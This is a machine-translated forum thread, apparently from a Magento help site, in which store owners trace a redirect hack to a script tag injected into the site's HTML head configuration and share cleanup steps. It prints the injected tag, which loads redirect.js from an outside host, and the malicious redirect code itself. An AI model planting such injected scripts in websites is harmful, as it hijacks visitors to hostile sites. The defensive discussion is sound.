Web sitesi başka bir URL'ye yönlendirmeye başladı

9

Maybe it's infected by some virus.

Web sitem bu virüs bulaşmış URL'ye yönlendirmeye başlıyor.

http://mon.setsu.xyz
ve bir süre https://tiphainemollard.us/index/?1371499155545
Virüs bulaşmış bağlantılar

Çözmek için ne yaptım.

  1. Yorumlanan .htaccess dosyası (hiçbir şey olmuyor)
  2. Yorum klasörü ekle (hiçbir şey olmuyor)
  3. Taranan tam sunucu (hiçbir şey olmuyor virüs zararlı yazılımı bulunamadı)
  4. Sadece hava durumu PHP veya herhangi bir js yapıyor sağlamak için veritabanından CSS, medya ve js yolu değiştirildi (hiçbir şey olmuyor)
  5. select * from core_config_data where path like '%secure%';tüm bağlantılar iyi GÜNCELLEME

Google'a gittim ve bunun üzerine birçok makale yazıldı, ancak bunun bir tarayıcı sorunu olduğunu veya sistemime virüs bulaştığını gösteriyor. Siteyi telefonumda veya kişisel dizüstü bilgisayarımda açsam bile bu konuda bir makale aynı.

GÜNCELLEME 2

Etkilenen veritabanındaki satırı buldum. (Boris K.'nın dediği gibi)

Olarak core_config_data tablo design/head/includes değeri bir olması

<script src="<a href="https://melissatgmt.us/redirect_base/redirect.js">https://melissatgmt.us/redirect_base/redirect.js</a>" id="1371499155545"></script>

Hangi sayfa yük baş bölümüne eklenecektir.

Yukarıdaki URL'yi ziyaret ederseniz, bir yönlendirme komut dosyası alırsınız. 

   var redirChrome;
var isToChrome = document.currentScript.getAttribute('data-type');

if((isToChrome == 1 && navigator.userAgent.indexOf("Chrome") != -1) || !isToChrome){

 var idToRedirect = document.currentScript.getAttribute('id'); 

window.location.replace('https://tiphainemollard.us/index/?'+idToRedirect);
}

Komut dosyasını kaldırdığımda müşteri web sitesi öğleden sonra çalışıyor. But the main problem is how that script inserted into the database.

Bir yama da eskidir, bu yüzden o yamayı da güncelledim.

GÜNCELLEME 3 Siteye tekrar virüs bulaştı. Yönetici bölümüne eklenen komut dosyasıdır ( Yönetici-> Yapılandırma-> Genel-> Tasarım-> HTML Başlığı-> Çeşitli Komut Dosyası ) yönetim

Ve veritabanı sütununda veri tabanı

Şimdi ne yapacağımı bilmiyorum. Her şifreyi değiştirirken, tüm eski kullanıcıları sildim.

GÜNCELLEME 3

Şimdiye kadar bu hata gelmediği için yukarıdaki adımları izleyerek bu sorunun üstesinden gelebiliriz.

GÜNCELLEME :: 4 Projeleri mağazada bu tür sorunlara daha az eğilimli hale getirmeme yardımcı olduğu için yamaları her zaman kurun ve yamalar da önemlidir. Web sitelerindeki sorunları kontrol etmek için https://magescan.com/ adresini kullanabilirsiniz .

magento-1  url  redirect 
inrsaurabh
kaynak
sisteminizde etkilenebilir, lütfen kontrol edin. tarayıcınızı kontrol edin.
Rama Chandran M
@RamaChandran bu url hakkında google tarayıcı sorunu olduğunu hemen hemen her bir öneri. Sitemi telefonumda da açtım aynı sayıda.
inrsaurabh
Lütfen web sitenizi URL'nizi sağlayın
Rama Chandran M
1
<Script src = "<a href =" melissatgmt.us/redirect_base/redirect.js "> https://… > "id =" 1371499155545 "> </script> 'i tasarım / başlıktan / içerikten sildim. Hala işe yaramadı. Web sitemi ziyaret ettikten sonra, bu javascripti kodu tekrar ortaya çıkıyor. Düşüncelerin var mı? Web sitesi adresi hdvideodepot.com
Mark
1
Lütfen magento sürüm etiketi ekleyebilir misiniz?
sv3n

Yanıtlar:

6

Enjekte edilen kodu core_config_datamasanın altında buldum design/head/includes. Kaldırıldı ve şimdi site normale döndü.

GÜNCELLEME: Herkesin de belirttiği gibi, bu sabah yine oldu. Bu sefer altındaki Yönetici Panelinden daha kolay kurtuldum System > Configuration > General > Design > HTML Head > Miscellaneous Scripts. Bu büyük bir güvenlik açığı, umarım Magento bir yama üzerinde çalışıyor.

GÜNCELLEME 2: Betik tekrar geldi, bu yüzden db şifresini değiştirdim, önbelleği temizledim. Yaklaşık bir saat sonra senaryo geri döndü. Bu yüzden db aracılığıyla eklendiğini sanmıyorum. Yönetici parolamı yeni değiştirdim, tekrar gelip gelmediğine bakalım.

GÜNCELLEME 3: Dün etkilenen sitelerimin ikisinde de yönetici şifresini değiştirdiğim için, yaklaşık 24 saat sonra her ikisi de hala temiz.

Boris K.
kaynak
2
vay, bu büyük bir güvenlik ihlali, ne tür bir güvenlik açığına neden olduğu hakkında herhangi bir fikir
Yehia A.Salam
3
Magento'nun eski sürümlerinde bir delik olmalı. Etkilenmeyen Magento 2.1 üzerine kurulmuş bir sitem var, ancak sürüm 2'nin altındaki her site yeniden yönlendiriliyor.
Boris K.
Bu büyük bir güvenlik sorunudur. Kodun tabloya nasıl enjekte edildiğini bilen var mı? Bu tablo, yönetici alanından web sitesinin altbilgisine / başlığına stiller ve javascript ekleyebileceğimiz yerdir. Bir bilgisayar korsanı bundan nasıl taviz verebilir? Yöneticiye erişimi olduğu anlamına mı geliyor?
Fıstık
sildikten sonra geri dönmeye devam ediyor, ne yapacağından emin değilim
Yehia A.Salam
Sistem> İzinler> Kullanıcılar'da kötü niyetli kullanıcılar tespit ettim. Onları kaldırdıktan sonra (ve daha önce core_config_data tablosunu düzelttikten ve yöneticinin şifresini değiştirdikten sonra), istikrarlı görünüyor, ancak bunun nasıl olduğunu ilk başta bilmek istiyorum. Delik / arka kapı hala orada olabilir ve bu bir gizem.
Fıstık
3

Aynı sorun başka bir magento sitesinde. Bir komut dosyasının sayfanın HEAD bölümüne enjekte edildiğini ve melissatgmt.us'dan redirect_base / redirect.js (daha sonra başka bir alana değiştirildi) talep ettiğini keşfettim, ancak bu bokun nasıl enjekte edildiğini anlayamıyorum.

GÜNCELLEME : Başkaları tarafından belirtildiği gibi, core_config_data tablosundaki girdiyi bulup kaldırdı, ancak kayıt bir sonraki sayfa yeniden yüklenmesinde geri döndü. Ben db şifresini değiştirdim ve şimdi yenilmiş gibi görünüyor. Şifre değişikliğinin nihai çözüm olduğundan emin değilim ama yine de bir güvenlik geliştirmesi.

GÜNCELLEME 2 : Jix Sas tarafından belirtildiği gibi, magento yönetimindeki yapılandırmadan erişim, veritabanı tablosuna doğrudan erişmekten daha kolay bir çözümdür. Ama bok her 10/15 dakikada bir geri geliyor.

GÜNCELLEME 3 : Yönetici şifresi değişti, bir şekilde virüs bulaşmış gibi görünen bazı cms sayfalarını (müşteri hizmetleri ve bizimle ilgili) kontrol etti ve kaydetti, önbelleği devre dışı bıraktı, önbelleği birkaç kez temizledi ('virüslü' cms sayfasının her kontrol ve kaydından sonra) hayır son 8 saat içinde daha fazla komut dosyası enjekte edildi.

ConsuLanza Informatica
kaynak
Evet, haklısın, etkilenen satırı aldım.
inrsaurabh
Magento admin sorunsuz erişilebilir ve web günlüğünde bot erişimlerinin etkilenmediğini görebilirsiniz. Kötü amaçlı yazılımın ön uçla sınırlı olduğunu ve tarayıcının kullanıcı aracısını kontrol ettiğini düşünüyorum.
ConsuLanza Informatica
peki nereden enjekte edildiğini biliyor muydunuz?
Yehia A.Salam
evet Veritabanından girişi sildikten sonra bile her 10/15 dakikada bir geri geldiğini onaylayabilirim
Yehia A.Salam
2

Yönetici panelinin yolunu değiştirdim app/etc/local.xmlve yardımcı oldu. Komut dosyası artık eklenmiyor design/head/includes.

Açıklama:

In app/etc/local.xmlDeğiştim <admin> <routers> <adminhtml> <args> <frontName><![CDATA[new_admin_path]]></frontName> </args> </adminhtml> </routers> </admin>Daha önce öyleydi sitedomain.com/adminve şimdi yönetici paneline yol olacak sitedomain.com/new_admin_path

Eugenia
kaynak
Üzgünüm, ne yaptığını sana anlamadım, lütfen açıklawhich path u chagned
inrsaurabh
/ Etc / local.xml uygulamasında daha önce değiştirdim <admin> <routers> <adminhtml> <args> <frontName><![CDATA[new_admin_path]]></frontName> </args> </adminhtml> </routers> </admin>Daha önce sitedomain.com/admin idi ve şimdi yönetici paneline giden yol sitedomain.com/new_admin_path olacak
Eugenia
Tamam ne önerdiğini
anladım
1

Bu çok büyük bir rahatlama, sitemi sabahtan beri 10 kez restore ettim.

Böcek tekrar tekrar geliyor.

Nihai çözüm nedir?

DB Şifresi değiştirilsin mi? Kök Parola Değiştirilsin mi? Herhangi Bir Yama Çıktı mı?

Bunun ilgili olup olmadığından emin değilim Güvenlik Danışmanlığı'ndan e-posta aldım

Sevgili Bay veya Bayan,

İsviçre, Polonya ve Hollanda merkezli bir Magento geliştirme şirketi olan Hatimeria'yız.

Son zamanlarda yeni bir müşteriyle çalışmaya başladık ve eski sunucusunu devraldık. Sunucuya eriştiğimiz anda, bilgisayar korsanlarının istemcinin sunucusunu ele geçirebildikleri ve diğer web sitelerini kesmek için onu bir "bilgisayar korsanları makinesi" olarak kullanabildikleri bazı kötü amaçlı yazılımlara rastladık. Tabii ki müşteri bunun sunucusunda olduğunu bilmiyordu.

Web sitenizin, bu sunucu aracılığıyla saldırıya uğrayan veritabanı kimlik bilgilerini bulduk. Tabii ki onunla hiçbir şey yapmayacağız, ama sizinle iletişim kurmak ve neler olduğunu size bildirmek zorunda hissediyorum. Saldırı, şu anda mağazanızda bulunabilecek Magento Cacheleak güvenlik açığıyla gerçekleştirildi.

Bu güvenlik açığıyla hemen ilgilenmenizi ve veritabanı parolanızı değiştirmenizi öneririm. Teknisyenlerimiz bunun yaklaşık 30 dakika sürmesi gerektiğini söylüyor.

MageReport web sitesinde, web sitenizin başka nelere karşı savunmasız olabileceğini görebilirsiniz: https://www.magereport.com/scan/?s=

Bu e-postanın birincil amacı bir müşteri kazanımı yapmak değil, ancak mağazanızı korumak için yardıma ihtiyacınız varsa veya başka sorularınız varsa yardımcı olmaktan memnuniyet duyarız.

Saygılarımla, Thomas Tanner

SO i Tahmin çözüm DB şifresini değiştirmek olduğunu

Mohit Khatri
kaynak
1

Bu tür spam enjeksiyonları için ANA nedenin ne olduğunu anlamamız gerekiyor

Sitenize enjekte edilmişse, lütfen sitenizi TÜM ÜÇÜNCÜ kötü amaçlı yazılım taramasında kontrol edin

https://magescan.com

https://www.magereport.com

https://sitecheck.sucuri.net/

Bunun eksik güvenlik yamasından kaynaklandığını hissediyorum! Bir yamanın eksik olduğunu görürseniz, BU KONU ALTINDA BİLDİRİN .

  1. Barındırma erişim parolasını değiştirme Veritabanı parolasını değiştirme Yönetici oturum açma parolalarını değiştirme URL'leri GİZLE VE İNDİRİN ve URL'leri gizle / RSS / genel görünümden gizle.

  2. Tam site virüs taraması yapın, barındırma sağlayıcınız kendiniz yapamazsanız siteyi tarayabilir.

  3. Sysytem -> Kullanıcılar bölümüne gidin ve hesapta yetkisiz kayıtlı kullanıcı olup olmadığına bakın.

ikon
kaynak
0

Sorunu çözdüm. Hatta sonra gelen fhis dosyayı silindi <script src="https://melissatgmt.us/redirect_base/redirect.js" id="1371499155545"></script>gelen core_config_datatablonun design/head/includesdeğeri. Sorunu çözmedi. kod kodu tekrar tekrar eklendi. Sorunu çözmek için bu üç adımı uygulayın.

  1. Komut dosyası kodunu içindeki core_config_datatablodan silin design/head/includes.
  2. app/etc/local.xmlKimlik bilgisi dahil veritabanı parolasını değiştirin .
  3. Bu komutu kullanarak root Magento klasöründeki Önbelleği Temizle rm -rf var/cache/*

ps Bütün gün geçirdim. Umarım, bu sizin için işe yarar. Ve dosyayı her zaman yedeklediğinizden emin olun.

işaret
kaynak
0

bugün de aynı şey oldu! aynı web sitesine yönlendiriliyor. ancak, komut dosyasını Magento yönetici panelinde yapılandırma> tasarım> html head> misc komut dosyaları altında buldum. Bu komut dosyası vardı: <script src="https://melissatgmt.us/redirect_base/redirect.js" id="1371499155545"></script> oradan kaldırdım ve web sitesi iyi çalışıyor. Ben komut dosyası buldum dedi klasör yok. Nerede olabilir herhangi bir fikir?

ayrıca, son zamanlarda ne yaptın? belki sebebini bulabiliriz? benim için, neden olabilecek ücretsiz bir bülten açılır penceresi yükledim. ya sen?

GÜNCELLEME: şimdi senaryo geri döndü. Birisi bana lütfen bu betiği kaldırmak için veritabanından nasıl erişebilirim?

GÜNCELLEME 2: Mark tarafından belirtildiği gibi, komut dosyasını kaldırmak VE veritabanı parolasını değiştirmek bu komut dosyasının geri gelmesini durdurdu. Bu güvenlik açığının adını bilen biri varsa veya müşterilerin ödeme tehlikesi varsa lütfen bize bildirin.

جيلبير
kaynak
Sitemizi kullandığınızda şunları okuyup anladığınızı kabul etmiş olursunuz: Çerez Politikası ve Gizlilik Politikası.
Licensed under cc by-sa 3.0 with attribution required.